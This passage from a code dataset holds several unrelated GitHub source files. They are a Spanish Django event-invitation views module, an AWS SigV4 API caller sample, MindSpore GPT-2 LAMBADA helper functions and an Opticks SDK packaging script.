[usuario.email]\n inv_count = Invitacion.objects.filter(evento_id=id1).count()\n print('COUNT>>', inv_count)\n inv = Invitacion(evento_id=evento, user_id=usuario, activa=True,\n asistencia_activa=False)\n inv.save()\n if inv_count > evento.capacidad:\n return HttpResponse('Ya no hay lugares disponibles :(')\n message = render_to_string('registration_mail.html', {\n 'user': usuario,\n 'domain': current_site.domain,\n 'uid':urlsafe_base64_encode(force_bytes(inv.pk)),\n 'token':invitacion_activacion_token.make_token(inv), # esto me causa dudas\n })\n img = make_qr(message)\n img.save('images/' + str(id1) + str(request.user) + '.png')\n nombre = 'images/' + str(id1) + str(request.user) + '.png'\n im = Image.open(nombre)\n Invitacion.objects.filter(pk=id1).update(qr=im)\n content += message\n # Generar el correo en html\n email = EmailMessage(subject, content, settings.EMAIL_HOST_USER, guest)\n email.attach_file('images/' + str(id1) + str(request.user) + '.png')\n email.send()\n print(usuario.email)\n print(evento.nombre)\n return HttpResponse('Se ha enviado la invitación por correo :3') \n return render(request, template, context) \n\n##########################################################################\n#Events Stuff\n##########################################################################\n\ndef listMyEvents(request):\n \"\"\"\n Vista de listar eventos \n \"\"\"\n eventos=Evento.objects.all()\n return render(request,'myEvents.html',{'eventos':eventos})\n\ndef seeEvent(request,id):\n \"\"\"\n Vista para ver un evento en específico\n \"\"\"\n evento = Evento.objects.get(id=id)\n return render(request,'verEvento.html',{'evento':evento})\n\ndef createEvent(request):\n \"\"\"\n Vista para crear un evento\n \"\"\"\n form = EventosForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('listMyEvents')\n return render(request,'eventsForm.html',{'form':form})\n\ndef updateEvent(request, id):\n \"\"\"\n Vista para actualizar un evento\n \"\"\"\n evento = Evento.objects.get(id=id)\n form = EventosForm(request.POST or None, instance=evento)\n if form.is_valid():\n form.save()\n return redirect('listMyEvents')\n return render(request,'eventsForm.html',{'form':form, 'evento':evento})\n# EventosForm no sirve (?)\n\ndef deleteEvent(request, id):\n \"\"\"\n Vista para borrar un evento\n \"\"\"\n evento = Evento.objects.get(id=id)\n if request.method == 'POST':\n evento.delete()\n return redirect('listMyEvents')\n return render(request, 'prod_delete-confirm.html',{'evento':evento})\n\nclass SearchEventsView(ListView):\n \"\"\"\n Vista para buscar eventos\n \"\"\"\n model = Evento\n template_name = 'search_results.html'\n def get_queryset(self):\n query = self.request.GET.get('q')\n object_list = Evento.objects.filter(\n # Lista de cosas por las que se puede buscar un evento\n Q(nombre__icontains=query) |\n Q(descripcion__icontains=query) |\n Q(direccion__icontains=query) |\n Q(fecha_inicio__icontains=query) | \n Q(etiqueta__nombre__icontains=query) |\n Q(precio__icontains=query)\n )\n return object_list\n\n##########################################################################\n#Staff Stuff\n##########################################################################\n\ndef addStaff(request):\n \"\"\"\n Agregar un staff\n \"\"\"\n form = StaffForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('listStaffs')\n return render(request,'staffForm.html',{'form':form})\n\ndef deleteStaff(request, id):\n \"\"\"\n Borrar un staff\n \"\"\"\n staff = Staff.objects.get(id=id)\n if request.method == 'POST':\n staff.delete()\n return redirect('listMyEvents')\n return render(request, 'prod_delete-confirm.html',{'staff':staff})\n\ndef listStaffs(request):\n \"\"\"\n Listar a todos los staffs\n \"\"\"\n eventos=Evento.objects.all()\n staffs=Staff.objects.all()\n return render(request,'myStaffs.html',{'eventos':eventos, 'staffs':staffs})\n\n##########################################################################\n# CREATE TAG\n##########################################################################\n\ndef newTag(request):\n \"\"\"\n Agregar un TAG\n \"\"\"\n tags=Etiqueta.objects.all()\n form = EtiquetaForm(request.POST or None)\n if form.is_valid():\n form.save()\n print('ulmo')\n return redirect('createEvent')\n print('ulmo2')\n return render(request,'createTag.html',{'etiquetas':tags})\n","repo_name":"mildewyPrawn/CafeCiencias","sub_path":"proyecto/app/Organizer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6762,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13435114938","text":"from dotenv import load_dotenv\nimport os\nimport boto3\nimport requests\n\nload_dotenv()\nregion = os.environ[\"api_region\"]\n\n# Simplifies making Amazon SigV4 calls with the python requests library\nfrom aws_requests_auth.boto_utils import BotoAWSRequestsAuth\ndef call_api(api_id: str, api_key=None): \n host = api_id+'.execute-api.'+region+'.amazonaws.com'\n base_url = f'https://{host}/api'\n get_url = f'{base_url}/{os.environ[\"api_resource\"]}'\n\n # Get authentication token - SigV4\n auth = BotoAWSRequestsAuth(aws_host=host, aws_region=region, aws_service='execute-api')\n try:\n response = requests.get(get_url, headers={'x-api-key': api_key}, timeout=2, auth=auth)\n except requests.exceptions.RequestException as e:\n raise SystemExit(e)\n return response\n\ndef main():\n boto3_session = boto3.session.Session(region_name=region)\n\n client = boto3_session.client('ssm')\n api_id = client.get_parameter(Name=os.environ[\"api_id_parameter\"])['Parameter']['Value']\n api_secret_arn = client.get_parameter(Name=os.environ[\"api_secret_parameter\"])['Parameter']['Value']\n\n client = boto3_session.client('secretsmanager')\n api_key = client.get_secret_value(SecretId=api_secret_arn)[\"SecretString\"]\n\n response = call_api(api_id, api_key)\n return response.text\n\nif __name__ == \"__main__\":\n print(main())","repo_name":"aws-samples/aws-zerotrust-service2service-workshop","sub_path":"src/ec2/curl-pkg/service_a_caller_sigv4.py","file_name":"service_a_caller_sigv4.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"25033587868","text":"from mindspore import Tensor\nfrom tensor_manipulations import extract_string_from_tensor\nfrom mindspore import dtype as mstype\nfrom mindspore.ops import operations as P\nfrom CrossEntropy import CrossEntropyCalculationWithMask\nfrom typing import TypeVar, Union\nfrom tokenization import Tokenizer\nimport numpy as np\n\ndef split_by_last_word(string_list):\n \"\"\"\n split list of strings list by last word \n \n Args:\n string_list: list(str), list of text in form of str\n \n Returns:\n list,list\n the list of text with last word removed and the last word text list\n\n \"\"\"\n # return [ ' '.join(s.split()[:-1]) for s in string_list],[ s.split()[-1:][0] for s in string_list]\n return [ ' '.join(s.split()[:-1]) for s in string_list]\n\ndef _get_lastword_range(prefix, stringlist, tokenizer=None):\n \"\"\"\n Get the range of lastword tokenized index in label_ids\n\n Args:\n prefix: list(str), list of text with its last word removed(a.k.a. \"prefix\") in form of str\n stringlist: list(str), list of text, same as it is in split_by_last_word \n tokenizer: GPT2Tokenizer, if not initiated, it will be created using the default setting in utils.tokenization, optional\n \n Returns:\n lastword_range: list(tuple), start and end postion of last word of each text of stringlist that used in selecting tokenized \n last word index in logits. lastword_logits --> logits[batch_index,start:end,::] \n \"\"\"\n if tokenizer is None:\n tokenizer = Tokenizer()\n print('[WARNING] parameter: tokenizer is missing in utils.lambada_utils.last_word_index, using Tokenizer() as default tokenizer')\n \n prefix_ids_len = [len(tokenizer.encode(prefix_str)) for prefix_str in prefix] # +1 for including bos \n full_ids_len = [len(tokenizer.encode(full_str)) for full_str in stringlist] # +1 for including bos \n \n #lastword_range = [(prefix_length, full_length) for prefix_length, full_length in zip(prefix_ids_len, full_ids_len)] \n lastword_range_ = [(prefix_length, full_length) for prefix_length, full_length in zip(prefix_ids_len, full_ids_len)]\n lastword_range = []\n for i in range(len(lastword_range_)):\n full_ids = tokenizer.encode(stringlist[i])\n last_prefix_id = tokenizer.encode(prefix[i])[-1]\n range_left = prefix_ids_len[i]\n for j in range(len(full_ids)-2,0,-1):\n if full_ids[j]== last_prefix_id:\n range_left = j+1\n break\n\n lastword_range.append((range_left,lastword_range_[i][1])) \n \n return lastword_range\n\ndef get_lastword_range(input_ids,config=None,tokenizer=None):\n \"\"\"\n Get the range of lastword tokenized index in input_ids\n\n Args:\n input_ids: Tensor(batch_size,seq_length)\n config: GPT2Config, config of GPT2 model, if not initiated, this function will create a MockConfig by params of input_ids, optional\n tokenizer: GPT2Tokenizer, if not initiated, it will be created using the default setting in utils.tokenization, optional\n \n Returns:\n lastword_range: list(tuple), start and end postion of last word of each text of stringlist that used in selecting tokenized \n last word index in logits. lastword_logits --> logits[batch_index,start:end,::] \n \"\"\"\n if tokenizer is None:\n tokenizer = Tokenizer()\n if config is None:\n config = MockConfig()\n config.batch_size = input_ids.shape[0]\n config.seq_length = input_ids.shape[1]\n\n string_list = extract_string_from_tensor(input_ids,mode='single',tokenizer=tokenizer,config=config)\n # prefix, _ = split_by_last_word(string_list)\n prefix = split_by_last_word(string_list)\n\n lastword_range = _get_lastword_range(prefix,string_list,tokenizer)\n\n return lastword_range\n\ndef extract_logits(logits = None, seq_pos = None):\n \"\"\"\n Args\n logits: Tensor(batch_size,seq_length,vocab_size) e.g.(8,1024,50257)\n seq_pos: list(batch_size) \n\n Return:\n output_logits: Tensor(batch_size,1,vocab_size) extract the Specified logit according to the seq_pos list .\n \"\"\"\n\n batch_size = logits.shape[0]\n for i in range(batch_size):\n\n logit = logits[i:i+1:1, seq_pos[i]:seq_pos[i]+1:1, ::]\n # print(\"extract_logits logit shape: {}\".format(logit.shape))\n if i == 0 :\n output_logits = logit\n else:\n output_logits = P.Concat()((output_logits, logit))\n\n # print(\"final logits:\",output_logits)\n \n return output_logits\n\n\ndef get_wholeword_label_str(input_ids,config=None,tokenizer=None):\n \"\"\"\n get whole word label_str from input_ids \n Args:\n input_ids: Tensor(batch_size,seq_length), indexs of input text\n config: GPT2Config, config of GPT2 model, if not initiated, this function will create a MockConfig by params of input_ids, optional\n tokenizer: GPT2Tokenizer, if not initiated, it will be created using the default setting in utils.tokenization, optional\n Returns:\n label_str: [str], lastword str given lambada as label\n \"\"\"\n if tokenizer is None:\n tokenizer = Tokenizer()\n if config is None:\n config = MockConfig()\n config.batch_size = input_ids.shape[0]\n config.seq_length = input_ids.shape[1]\n config.vocab_size = tokenizer.vocab_size\n\n #lastword_range is a list of tuples, seems like [...,(start_position_i,end_position_i),...]\n lastword_range = get_lastword_range(input_ids,config,tokenizer=tokenizer)\n\n #input_ids requires to shift right for one step for its every first token is <BOS> \n ids = input_ids[::,1:].asnumpy()\n\n label_ids = [ id_[index[0]:index[1]].tolist() for index,id_ in zip(lastword_range,ids)]\n \n # use GPT2Tokenizer to decode\n label_str = [ tokenizer.decode(label_id) for label_id in label_ids ]\n\n return label_str\n\nclass MockConfig:\n def __init__(self):\n pass\n\nif __name__ == \"__main__\":\n pass","repo_name":"viewsetting/MindSpore-GPT2","sub_path":"src/utils/lambada_utils.py","file_name":"lambada_utils.py","file_ext":"py","file_size_in_byte":5944,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"20937328629","text":"#!/usr/bin/env python3\nimport os\nfrom os.path import join\nimport os.path\nimport sys\nfrom optparse import OptionParser\nimport traceback\nimport shutil\nimport subprocess\nimport zipfile\n\nclass ScriptException(Exception):\n \"Report error while running script\"\n\ndef execute_process(args, bufsize=0, executable=None, preexec_fn=None,\n close_fds=None, shell=False, cwd=None, env=None,\n universal_newlines=False, startupinfo=None, creationflags=0):\n if sys.platform.startswith(\"win\"):\n stdin = subprocess.PIPE\n stdout = sys.stdout\n stderr = sys.stderr\n else:\n stdin = None\n stdout = None\n stderr = None\n\n process = subprocess.Popen(args, bufsize=bufsize, stdin=stdin,\n stdout=stdout, stderr=stderr, executable=executable,\n preexec_fn=preexec_fn, close_fds=close_fds, shell=shell,\n cwd=cwd, env=env, universal_newlines=universal_newlines,\n startupinfo=startupinfo, creationflags=creationflags)\n if sys.platform.startswith(\"win\"):\n process.stdin.close()\n returncode = process.wait()\n return returncode\n\ndef cp_file2(source_base_dir, destination_base_dir, common_dir, file_to_copy):\n full_src_file = join(source_base_dir, common_dir, file_to_copy)\n full_dst_dir = join(destination_base_dir, common_dir)\n return cp_file(full_src_file, full_dst_dir)\n\ndef cp_file(source_file, destination_dir):\n \"\"\"Copy specified file to destination dir, creating all necessary folders\n in destination if needed.\n\n src_file -- path of source file\n dst_dir -- path of destination directory\n\n \"\"\"\n if not(os.path.exists(destination_dir)):\n os.makedirs(destination_dir)\n shutil.copy2(source_file, join(destination_dir,\n os.path.basename(source_file)))\n\ndef cp_file3(source_file, destination_file):\n destination_dir = os.path.dirname(destination_file)\n if not(os.path.exists(destination_dir)):\n os.makedirs(destination_dir)\n shutil.copy2(source_file, destination_file)\n\ndef cp_dir2(source_base_dir, destination_base_dir, dir_to_copy,\n suffixes_to_match = [], exclude_matches = False,\n recursive_copy = False, dirs_to_exclude = [\".svn\", \"_svn\"]):\n full_src_dir = join(source_base_dir, dir_to_copy)\n full_dst_dir = join(destination_base_dir, dir_to_copy)\n return cp_dir(full_src_dir, full_dst_dir, suffixes_to_match,\n exclude_matches, recursive_copy, dirs_to_exclude)\n\ndef cp_dir(source_dir, destination_dir, suffixes_to_match = [],\n exclude_matches = False, recursive_copy = False,\n dirs_to_exclude = [\".svn\", \"_svn\"]):\n \"\"\"Copy all files with or without specified suffix in source directory to\n destination directory\n\n @param source_dir: path of source directory\n @type source_dir: L{str}\n @param destination_dir: path of destination directory\n @type destination_dir: L{str}\n @param suffixes_to_match: a list of the specified suffixes to\n match before files are copied. This may\n be an empty list and all files will match\n and therefore be copied.\n @type suffixes_to_match: L{list} of L{str}\n @param exclude_matches: if False, only files that end with\n suffix will be copied. If True, only\n files that don't end with suffix will be copied.\n @type exclude_matches: L{bool}\n @param recursive_copy: If True, the copy will be performed\n recursively. Note that the suffix to match\n only applies to files and not directories.\n @type recursive_copy: L{bool}\n @param dirs_to_exclude: List of directories that should be\n excluded when recursion is applied.\n @type dirs_to_exclude: L{list} of L{str}\n\n This function will create destination directory if it does not exist.\n \"\"\"\n dir_contents = os.listdir(source_dir)\n symlinks = False\n if not(os.path.exists(destination_dir)):\n os.makedirs(destination_dir)\n for entry in dir_contents:\n src_path = join(source_dir, entry)\n dst_path = join(destination_dir, entry)\n if symlinks and os.path.islink(src_path):\n linkto = os.readlink(src_path)\n os.symlink(linkto, dst_path)\n elif os.path.isdir(src_path):\n if recursive_copy and dirs_to_exclude.count(entry) == 0:\n cp_dir(src_path, dst_path, suffixes_to_match,\n exclude_matches, recursive_copy, dirs_to_exclude)\n else:\n matches = False\n if suffixes_to_match is None or len(suffixes_to_match) == 0:\n matches = True\n else:\n for suffix in suffixes_to_match:\n if entry.endswith(suffix) != exclude_matches:\n matches = True\n\n if matches:\n source_file = src_path\n if symlinks:\n the_file = commonutils.isSubversionSoftLink(source_file)\n if the_file is not None:\n source_file = the_file\n\n shutil.copy2(source_file, dst_path)\n\ndef copy_windows_build(opticks_code_dir, sdk_dest_dir,\n win_debug_dest_dir, static_libs, plugins,\n is_32_bit, is_debug, verbosity):\n if is_32_bit:\n arch = \"Win32\"\n else:\n arch = \"x64\"\n if is_debug:\n mode = \"debug\"\n else:\n mode = \"release\"\n binaries_dir = join(\"Build\", \"Binaries-%s-%s\" % (arch, mode))\n\n executables = [\"Opticks.exe\", \"OpticksBatch.exe\", \"SimpleApiLib.dll\"]\n for the_exec in executables:\n cp_file2(opticks_code_dir, sdk_dest_dir,\n join(binaries_dir, \"Bin\"), the_exec)\n\n for the_lib in static_libs:\n cp_file2(opticks_code_dir, sdk_dest_dir,\n join(binaries_dir, \"Lib\"), the_lib + \".lib\")\n\n for the_plugin in plugins:\n cp_file2(opticks_code_dir, sdk_dest_dir,\n join(binaries_dir, \"PlugIns\"), the_plugin + \".dll\")\n\n cp_dir2(opticks_code_dir, sdk_dest_dir,\n join(binaries_dir, \"PlugIns\", \"ArcProxy\"),\n suffixes_to_match = [\".dll\", \".exe\"])\n\n if is_debug:\n #Copy the pdbs for the static_libs\n if verbosity > 1:\n print(\"Gathering pdb's for %s...\" % (arch))\n all_pdbs = [os.path.splitext(x)[0] for x in executables] + static_libs + plugins\n for the_file in all_pdbs:\n pdbs_dir = join(binaries_dir,\"pdbs\")\n cp_file2(opticks_code_dir, win_debug_dest_dir,\n pdbs_dir, the_file + \".pdb\")\n if verbosity > 1:\n print(\"Done gathering pdb's for %s...\" % (arch))\n\ndef copy_dir_into_zip(zip_file, parent_src_dir, the_dir,\n prefix_dir, keep_the_dir=True):\n src_dir = join(parent_src_dir, the_dir)\n for root, dirs, files in os.walk(src_dir):\n try:\n dirs.remove(\".svn\")\n except Exception:\n pass\n try:\n dirs.remove(\"_svn\")\n except Exception:\n pass\n if keep_the_dir:\n the_zip_dir = root[len(parent_src_dir)+1:]\n else:\n the_zip_dir = root[len(parent_src_dir) + len(the_dir) + 1:]\n for the_file in files:\n source_file = join(root, the_file)\n linked_file = commonutils.is_subversion_soft_link(source_file)\n if linked_file is not None:\n source_file = linked_file\n zip_file.write(source_file,\n join(prefix_dir, the_zip_dir, the_file))\n\ndef create_toolkit_zip(opticks_code_dir, opticks_dependencies_dir,\n package_dir, ms_help_compiler,\n release32, debug32, release64, debug64,\n verbosity):\n\n if opticks_dependencies_dir is None:\n if \"OPTICKSDEPENDENCIES\" in os.environ:\n opticks_dependencies_dir = os.environ[\"OPTICKSDEPENDENCIES\"]\n else:\n raise ScriptException(\"The path to the Opticks \"\\\n \"dependencies was not provided, see -d\")\n\n if not(os.path.exists(opticks_dependencies_dir)):\n raise ScriptException(\"The path to the Opticks dependencies \"\\\n \"does not exist %s, see -d\")\n\n if verbosity >= 1:\n print(\"Removing output from previous runs...\")\n out_dir = os.path.abspath(join(\"Toolkit\", \"SDK-Temp\"))\n win_debug_dir = os.path.abspath(join(\"Toolkit\", \"WinDebug-Temp\"))\n if os.path.exists(out_dir):\n shutil.rmtree(out_dir, False)\n\n if os.path.exists(win_debug_dir):\n shutil.rmtree(win_debug_dir, False)\n\n if verbosity >= 1:\n print(\"Done removing output from previous runs\")\n\n if verbosity >= 1:\n print(\"Creating SDK...\")\n app_version = commonutils.get_app_version_only(opticks_code_dir)\n ##### Create all the output directories\n os.makedirs(out_dir)\n os.makedirs(win_debug_dir)\n\n if verbosity > 1:\n print(\"Gathering files for SDK...\")\n cp_file3(\"README-sdk.txt\", join(out_dir, \"README.txt\"))\n s_app = os.path.abspath(join(opticks_code_dir, \"application\"))\n s_release = os.path.abspath(join(opticks_code_dir, \"Release\"))\n d_app = join(out_dir,\"application\")\n\n interface_suffixes = [\".h\"]\n cp_dir2(s_app, d_app, \"Interfaces\", suffixes_to_match=interface_suffixes)\n cp_dir2(s_app, d_app, join(\"PlugInUtilities\", \"Interfaces\"),\n suffixes_to_match=interface_suffixes)\n cp_dir2(s_app, d_app, join(\"PlugInUtilities\", \"pthreads-wrapper\"),\n suffixes_to_match=interface_suffixes)\n cp_dir2(s_app, d_app, \"SimpleApiLib\",\n suffixes_to_match=interface_suffixes)\n compile_settings_suffix = [\".py\"]\n if is_windows():\n compile_settings_suffix.append(\".props\")\n cp_dir2(s_app, d_app, \"CompileSettings\",\n suffixes_to_match=compile_settings_suffix)\n cp_dir2(s_app, d_app, \"PlugInLib\", suffixes_to_match=interface_suffixes)\n cp_dir2(s_app, d_app, \"HdfPlugInLib\", suffixes_to_match=interface_suffixes)\n cp_dir2(s_app, d_app, \"NitfPlugInLib\",\n suffixes_to_match=interface_suffixes)\n\n #Copy the PlugInSamplerQt code to the right spot\n source_suffixes = interface_suffixes + [\".cpp\", \".ui\"]\n if is_windows():\n source_suffixes.append(\".vcxproj\")\n else:\n source_suffixes.append(\"SConscript\")\n\n cp_dir2(s_app, d_app, join(\"PlugIns\", \"src\", \"PlugInSamplerQt\"),\n suffixes_to_match=source_suffixes)\n cp_dir2(s_app, d_app, join(\"PlugIns\", \"src\", \"PlugInSampler\"),\n suffixes_to_match=source_suffixes)\n cp_dir2(s_app, d_app, join(\"PlugIns\", \"src\", \"PlugInSamplerHdf\"),\n suffixes_to_match=source_suffixes)\n cp_dir2(s_app, d_app, join(\"PlugIns\", \"src\", \"Tutorial\"),\n suffixes_to_match=source_suffixes)\n cp_file2(s_app, d_app, join(\"PlugIns\", \"src\", \"Aspam\"), \"Aspam.h\")\n\n if verbosity > 1:\n print(\"Done gathering files for SDK\")\n\n win_debug_code_dir = join(win_debug_dir, \"Code\")\n if is_windows():\n if verbosity > 1:\n print(\"Exporting Opticks source code...\")\n svn_export_code_args = list()\n svn_export_code_args.append(\"svn\")\n svn_export_code_args.append(\"export\")\n svn_export_code_args.append(\"-r\")\n svn_export_code_args.append(\"BASE\")\n svn_export_code_args.append(os.path.abspath(opticks_code_dir))\n svn_export_code_args.append(win_debug_code_dir)\n print(svn_export_code_args)\n input('> ')\n retcode = 0\n #retcode = execute_process(svn_export_code_args)\n if retcode != 0:\n raise ScriptException(\"Unable to export code.\")\n if verbosity > 1:\n print(\"Done exporting Opticks source code\")\n\n cp_file3(\"README-pdb-source.txt\",\n join(win_debug_dir, \"README.txt\"))\n\n #Copy dependencies\n if verbosity > 1:\n print(\"Exporting dependencies...\")\n svn_export_args = list()\n svn_export_args.append(\"svn\")\n svn_export_args.append(\"export\")\n svn_export_args.append(\"-r\")\n svn_export_args.append(\"BASE\")\n svn_export_args.append(os.path.abspath(opticks_dependencies_dir))\n svn_export_args.append(join(out_dir, \"Dependencies\"))\n print(svn_export_args)\n input('> ')\n #retcode = execute_process(svn_export_args)\n retcode = 0\n if retcode != 0:\n raise ScriptException(\"Unable to export dependencies\")\n if verbosity > 1:\n print(\"Done exporting dependencies\")\n\n ##### Run Doxygen to generate the html documentation\n if verbosity > 1:\n print(\"Generating Doxygen...\")\n build_doxygen_args = [\"python\", join(os.path.abspath(opticks_code_dir),\n \"build.py\"),\n \"--build-doxygen=all\",\n \"-d\", opticks_dependencies_dir]\n if is_windows():\n build_doxygen_args.append(\"--ms-help-compiler=%s\" % (ms_help_compiler))\n if verbosity == 2:\n build_doxygen_args.append(\"-v\")\n if verbosity == 0:\n build_doxygen_args.append(\"-q\")\n retcode = execute_process(build_doxygen_args)\n if retcode != 0:\n raise ScriptException(\"Error occurred while building \"\\\n \"on-line help\")\n s_doxygen_output = join(opticks_code_dir, \"Build\", \"DoxygenOutput\")\n d_doc_output = join(out_dir, \"doc\")\n cp_dir2(s_doxygen_output, d_doc_output, \"html\", recursive_copy = True)\n if is_windows():\n cp_file2(s_doxygen_output, d_doc_output, \"\",\n \"OpticksSDK-%s.chm\" % (app_version))\n if verbosity > 1:\n print(\"Done generating Doxygen\")\n\n if verbosity > 1:\n print(\"Acquiring Opticks binaries...\")\n static_libs = [\"PlugInLib\", \"PlugInUtilities\", \"HdfPlugInLib\", \"NitfPlugInLib\"]\n if is_windows():\n static_libs.append(\"SimpleApiLib\")\n plugins = [ \"AnnotationImagePalette\", \"Aspam\", \"AutoImporter\", \"BandBinning\", \"BandMath\", \"ConvolutionFilter\",\n \"CoreIo\", \"Covariance\", \"DataFusion\", \"Dted\", \"ENVI\", \"Fits\", \"GdalImporter\", \"Generic\",\n \"GeographicFeatures\", \"GeoMosaic\", \"Georeference\", \"Hdf\", \"Ice\", \"ImageComparison\", \"Kml\",\n \"Modis\", \"MovieExporter\", \"Nitf\", \"NitfCommonTre\", \"ObjectFinding\", \"Pca\", \"Pictures\", \"Results\",\n \"Scripts\", \"SecondMoment\", \"ShapeFileExporter\", \"Sio\", \"SpatialResampler\", \"Wavelength\",\n \"WizardExecutor\", \"WizardItems\" ]\n sample_plugins = [\"PlugInSampler\", \"PlugInSamplerQt\",\n \"PlugInSamplerHdf\", \"Tutorial\" ]\n if is_windows():\n cp_file2(s_app, d_app, \"\", \"SamplePlugIns.sln\")\n cp_file2(s_app, d_app, \"PlugInManager\", \"PlugInModule.def\")\n\n plugins = plugins + sample_plugins + [ \"Collada\" ]\n #Win32 Build\n if debug32:\n copy_windows_build(opticks_code_dir, out_dir,\n win_debug_code_dir, static_libs,plugins, True, True, verbosity)\n dp_list = commonutils.get_dependencies(opticks_dependencies_dir,\n \"Windows\", True, \"32\")\n bin_dir = join(out_dir, \"Build\", \"Binaries-win32-debug\", \"Bin\")\n commonutils.copy_dependencies(dp_list, bin_dir)\n if release32:\n copy_windows_build(opticks_code_dir, out_dir,\n win_debug_code_dir, static_libs, plugins, True, False, verbosity)\n dp_list = commonutils.get_dependencies(opticks_dependencies_dir,\n \"Windows\", False, \"32\")\n bin_dir = join(out_dir, \"Build\", \"Binaries-win32-release\", \"Bin\")\n commonutils.copy_dependencies(dp_list, bin_dir)\n\n #Win64 Build\n if debug64:\n copy_windows_build(opticks_code_dir, out_dir,\n win_debug_code_dir, static_libs, plugins, False, True, verbosity)\n dp_list = commonutils.get_dependencies(opticks_dependencies_dir,\n \"Windows\", True, \"64\")\n bin_dir = join(out_dir, \"Build\", \"Binaries-x64-debug\", \"Bin\")\n commonutils.copy_dependencies(dp_list, bin_dir)\n if release64:\n copy_windows_build(opticks_code_dir, out_dir,\n win_debug_code_dir, static_libs, plugins, False, False, verbosity)\n dp_list = commonutils.get_dependencies(opticks_dependencies_dir,\n \"Windows\", False, \"64\")\n bin_dir = join(out_dir, \"Build\", \"Binaries-x64-release\", \"Bin\")\n commonutils.copy_dependencies(dp_list, bin_dir)\n else:\n cp_file2(s_app, d_app, join(\"PlugIns\", \"src\"), \"SConstruct\")\n if sys.platform.startswith(\"linux\"):\n binaries_dir = join(\"Build\", \"Binaries-linux-x86_64-release\")\n else:\n binaries_dir = join(\"Build\", \"Binaries-solaris-sparc-release\")\n lib_dir = join(binaries_dir,\"Lib\")\n for the_lib in static_libs:\n cp_file2(opticks_code_dir, out_dir, lib_dir, \"lib%s.a\" % (the_lib))\n cp_file2(opticks_code_dir, out_dir, lib_dir, \"libSimpleApiLib.so\")\n cp_file2(opticks_code_dir, out_dir, lib_dir, \"ModuleShell.os\")\n\n for the_plugin in sample_plugins:\n cp_file2(opticks_code_dir, out_dir,\n join(binaries_dir,\"PlugIns\"), \"%s.so\" % (the_plugin))\n if not sys.platform.startswith(\"linux\"):\n #Make copy of the \"application\" dir but with an upper-case\n #first letter to maintain compatibility with earlier SDKs\n cp_dir(d_app, join(out_dir, \"Application\"), recursive_copy = True)\n if verbosity > 1:\n print(\"Done acquiring Opticks binaries\")\n if verbosity >= 1:\n print(\"Done building SDK\")\n\n if package_dir is not None and os.path.exists(package_dir):\n if is_windows():\n zip_name = join(package_dir,\n \"opticks-sdk-%s-windows.zip\" % (app_version))\n if verbosity > 1:\n print(\"Creating compressed archive %s...\" % (zip_name))\n zip_obj = zipfile.ZipFile(zip_name, \"w\", zipfile.ZIP_DEFLATED)\n copy_dir_into_zip(zip_obj, os.path.abspath(\"Toolkit\"),\n \"SDK-Temp\", \".\", False)\n zip_obj.close()\n if verbosity > 1:\n print(\"Done creating compressed archive\")\n\n zip_name = join(package_dir,\n \"opticks-pdb-sourcecode-%s-windows.zip\" % (app_version))\n if verbosity > 1:\n print(\"Creating compressed archive %s...\" % (zip_name))\n zip_obj = zipfile.ZipFile(zip_name, \"w\", zipfile.ZIP_DEFLATED)\n copy_dir_into_zip(zip_obj, os.path.abspath(\"Toolkit\"),\n \"WinDebug-Temp\", \".\", False)\n zip_obj.close()\n if verbosity > 1:\n print(\"Done creating compressed archive\")\n else:\n if sys.platform.startswith(\"linux\"):\n output_tar_bz2 = os.path.abspath(join(package_dir,\n \"opticks-sdk-%s-linux-x86_64.tar.bz2\" % (app_version)))\n else:\n output_tar_bz2 = os.path.abspath(join(package_dir,\n \"opticks-sdk-%s-sol10-sparc.tar.bz2\" % (app_version)))\n if verbosity > 1:\n print(\"Creating compressed archive %s...\" % (output_tar_bz2))\n tar_args = list()\n tar_args.append(\"tar\")\n tar_args.append(\"-cvf\")\n tar_args.append(\"-\")\n tar_args.append(\".\")\n tar = subprocess.Popen(tar_args, stdout=subprocess.PIPE,\n cwd=out_dir)\n\n output_handle = open(output_tar_bz2, \"wb\")\n bzip2_args = list()\n bzip2_args.append(\"bzip2\")\n bzip2_args.append(\"-c\")\n bzip2 = subprocess.Popen(bzip2_args, stdin=tar.stdout,\n stdout=output_handle)\n\n tar_ret = tar.wait()\n bzip_ret = bzip2.wait()\n output_handle.close()\n if tar_ret != 0:\n raise ScriptException(\"Running tar failed.\")\n if bzip_ret != 0:\n raise ScriptException(\"Running bzip2 failed.\")\n if verbosity > 1:\n print(\"Done creating compressed archive\")\n\ndef is_windows():\n \"\"\"Determine if this script is executing on the Windows operating system.\n @return: Return True if script is executed on Windows, False otherwise.\n @rtype: L{bool}\n\n \"\"\"\n return sys.platform.startswith(\"win32\")\n\ndef parse_args(args):\n ##### Parse the arguments\n if is_windows():\n desc = \"Generate the Developers Toolkit .zip file for the \"\\\n \"32-bit and 64-bit version of Opticks for Windows.\"\n else:\n desc = \"Generate the Developers Toolkit file for the Solaris or Linux \"\\\n \"version of Opticks.\"\n\n parser = OptionParser(usage=\"%prog [options]\",\n version=\"%prog 1.0\", description=desc)\n parser.add_option(\"-c\", \"--code-dir\", action=\"store\",\n dest=\"opticks_code_dir\",\n help=\"The path to the checkout of the Code folder \"\\\n \"from the Opticks trunk.\")\n parser.add_option(\"-d\", action=\"store\", dest=\"dependencies\",\n help=\"The path to Opticks dependencies\")\n parser.add_option(\"--package-dir\", action=\"store\",\n dest=\"package_dir\", help=\"The directory where the toolkit \"\\\n \"output should be stored. This directory must already exist.\")\n if is_windows():\n ms_help_compiler_path = \"C:\\\\Program Files (x86)\\\\HTML Help Workshop\"\n if not os.path.exists(ms_help_compiler_path):\n ms_help_compiler_path = \"C:\\\\Program Files\\\\HTML Help Workshop\"\n parser.add_option(\"--ms-help-compiler\",\n dest=\"ms_help_compiler\", action=\"store\", type=\"string\")\n parser.add_option(\"--Nr32\",\n help=\"Omit the release 32-bit binaries from the SDK\",\n dest=\"release32\", action=\"store_false\")\n parser.add_option(\"--Nd32\",\n help=\"Omit the debug 32-bit binaries from the SDK\",\n dest=\"debug32\", action=\"store_false\")\n 